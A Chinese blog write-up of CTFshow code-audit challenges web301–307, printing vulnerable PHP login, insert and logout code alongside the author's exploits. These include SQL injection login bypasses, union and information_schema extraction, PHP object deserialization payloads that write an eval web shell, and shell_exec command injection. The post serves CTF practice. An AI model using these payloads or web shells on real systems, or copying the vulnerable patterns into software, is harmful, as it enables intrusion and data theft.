CTFSHOW 代码审计

最新推荐文章于 2024-05-27 17:42:35 发布
最新推荐文章于 2024-05-27 17:42:35 发布
阅读量2.6k 收藏
点赞数
分类专栏: 代码审计 文章标签: web安全 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51584770/article/details/121412461
版权

立个flag,这周必更完。。。

web 301

下载源码,审一下logincheck.php

<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}
$_SESSION['error']="1";
header("location:login.php");

?>

发现这里的username是采用.进行拼接的,所以可以采用'闭合进行拼接

strcasecmp($userpwd,$row['sds_password']

在这里插入图片描述
但是strcasecmp这个函数存在漏洞,如果我们传入一个数组,会返回NULL,那么正好!null为true

payload:

userid=admin’ or 1=1#&userpwd[]=1

feng师傅的博客中学到了用Union进行联合注入
在这里插入图片描述
payload:

userid='union select 1#&userpwd=1

web 302

这道比上一道多了一些东西

<?php
error_reporting(0);
session_start();
require 'conn.php';
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}
$_SESSION['error']="1";
header("location:login.php");

?>

经过md5加密,我上一道题目的做法就不能使用了,继续用union联合查询
payload:

userid=’ union select ‘d9c77c4e454869d5d8da3b4be79694d3’%23&userpwd=1

WEB 303

比上一道题目还是修改了一下

<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
if(strlen($username)>6){
	die();
}
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}
$_SESSION['error']="1";
header("location:login.php");

?>

多加了一个userid的长度不能超过6,emmmm,select的长度就有6了。。。尝试构造
在这里插入图片描述
然后密码那里我就懵了,因为在fun.php那里输出了一个admin进行加密后的结果,所以我就才是密码是admin,然后就登上了

在user.sql文件中可以发现:

INSERT INTO `sds_user` VALUES (‘1’, ‘admin’, ‘27151b7b1ad51a38ea66b1529cde5ee4’);

登上之后,发现源码标注出了注入点

<?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{
	//注入点
	$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
	$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
	$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
	$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
	$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
	$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
	
	$dpt_name=$_POST['dpt_name'];
	$dpt_address=$_POST['dpt_address'];
	$dpt_build_year=$_POST['dpt_build_year'];
	$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
	$dpt_cert_number=$_POST['dpt_cert_number'];
	$dpt_telephone_number=$_POST['dpt_telephone_number'];
	$mysqli->query("set names utf-8");
	$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
	$result=$mysqli->query($sql);
	echo $sql;
	if($result===true){
		$mysqli->close();
		header("location:dpt.php");
	}else{
		die(mysqli_error($mysqli));
	}
	
	 }


?>

我采用的方法是

INSERT INTO USER SET uid=NULL,uname=’’||(IF(1=1,1,0))/’,upassword=’/,upassword=‘1’

但是在这里插入图片描述
没有成功,我不理解为什么,感觉挺对的

最后采用的是

sds_name=1’,sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

一步一步注入得到flag

web 304

跟上一道题目一样,只是表名换了

web 305

<?php
session_start();
require 'conn.php';
require 'fun.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{
	//注入点
	$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
	$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
	$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
	$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
	$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
	$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
	
	$dpt_name=sds_waf($_POST['dpt_name'])?$_POST['dpt_name']:"";
	$dpt_address=sds_waf($_POST['dpt_address'])?$_POST['dpt_address']:"";
	$dpt_build_year=sds_waf($_POST['dpt_build_year'])?$_POST['dpt_build_year']:"";
	$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
	$dpt_cert_number=sds_waf($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:"";
	$dpt_telephone_number=sds_waf($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:"";
	$mysqli->query("set names utf-8");
	$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
	$result=$mysqli->query($sql);
	echo $sql;
	if($result===true){
		$mysqli->close();
		header("location:dpt.php");
	}else{
		die(mysqli_error($mysqli));
	}
	
	 }


?>

再上一道题目注入点那里加入了waf

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
	if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
		return false;
	}else{
		return true;
	}
}
?>

但是他在checklogin.php那里加入了反序列化漏洞

if(isset($user_cookie)){
	$user = unserialize($user_cookie);
}

class.php

class user{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
	public function __destruct(){
		file_put_contents($this->username, $this->password);
	}
}

直接写马

<?php 
class user{
  public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
}

echo(serialize(new user('shell.php','<?php eval($_POST[a]);?>')));

然后编码后写到cookie那里
然后进行命令执行

a=include('conn.php');$sql='select flag from sds_flabag';$result=$mysqli->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);var_dump($row);

看feng师傅博客说,连上蚁剑也可以但是我没有成功(数据库的密码源码里给的是假的)

web 306

我昨天晚上写了,没保存,他没了…不写了!!!

web 307

这么多代码,只能一个一个的看了呗
在logout.php里面发现了一个

<?php
session_start();
error_reporting(0);
require 'service/service.php';
unset($_SESSION['login']);
unset($_SESSION['error']);
setcookie('user','',0,'/');
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
	$service->clearCache();
}
setcookie('PHPSESSID','',0,'/');
setcookie('service','',0,'/');
header("location:../login.php");
?>

ok,反序列化
注意下面有一个

if($service){
	$service->clearCache();
}

可以看一下这个方法,在dao.php里面

public function  clearCache(){
		shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
	}

命令执行漏洞,那就拼接命令

<?php
highlight_file(__FILE__);

class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}
}
class config{
	public $cache_dir = '; echo "<?php eval(\$_POST[a]);?>" > a.php;';
}

echo(serialize(new dao()));
echo('<br>');
echo(base64_encode(serialize(new dao())));

shell_exec: 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
$在linux中有特殊的含义,所以这里应该使用转移字符

luckyilsy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 431
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTF-WEB(JS,解码)
Zhang_hongchao的博客
02-13 850
题目:打开网址显示以下内容: 点击多次后还是有这个弹窗,按F12查看源代码显示以下内容: 这个弹窗是有数量的,多次点击完毕后没有出来flag。 再次查看源代码,在最后有一段注释的Unicode码: 进行Unicode编码转换后得到flag。 ...
ctfshow web入门 web306--web310源码审计
最新发布
2301_81040377的博客
05-27 597
链接:https://juejin.cn/post/7083293190022758407。访问1.php再rce就行了,但是不知道为啥我今天做不出来,弄了好一会了。商业转载请联系作者获得授权,非商业转载请注明出处。说的源码没变,这里我们写个EXP看配置文件。这些题都要在index.php发包才可以。我是终于找到了在一堆里面弄。这和之前的完全不一样了。作者:OceanSec。
CTFShow代码审计
paidx0
12-08 3841
CTFShow代码审计
ctfshow代码审计
qq_63928796的博客
12-26 228
Seay审一下啥也没有,直接上手看在checklogin.php中sql语句中,username没有过滤而产生的sql注入漏洞登录成功拿到flag。
ctfshow 代码审计
qq_45951598的博客
05-21 708
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
CTFshow 代码审计
starttv的博客
11-30 897
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow代码审计
qq_61768489的博客
01-26 1271
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
ctfshow web入门 代码审计
Lum1n0us's Blog
08-04 735
文章目录web301web302web303web304web305 web301 下载源码后在checklogin.php发现问题代码 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; $_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpw
ctfshow 代码审计专题
akxnxbshai的博客
02-21 374
重新过一遍,写了个wp。
ctfshow 代码审计 web301~310
shinygod的博客
09-24 801
知识点:SSRF--gopher协议打FastCGI(PHP-FPM的未授权访问漏洞),file伪协议,nginx配置文件
ctfshow web入门(代码审计)
qq_53263789的博客
07-19 341
ctfshow
ctfshow254-278(代码审计,反序列化)
qq_37561898的博客
01-22 2602
ctfshow254-278(代码审计,反序列化),ctfshow web
ctfshow web 5 php的代码审计
m0_46412682的博客
07-13 221
ctfshow web 5 php的代码审计 一打开就是一段php的代码 那我们来分析一下,get传参,有两个变量v1 和v2,两个变量必须同时存在,ctype_alpha(v1)判断变量是否全是字母,is_numeric(v2)是判断变量v2是否都是数字,还有一个是判断md5之后是否相同,所以我在网上找了md5之后的值是一样的,md5(‘240610708’) ==md5(‘QNKCDZO’) 所以直接传参 flag{d76aff5b-e619-4eb8-b0ff-9bbc0627170b} ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值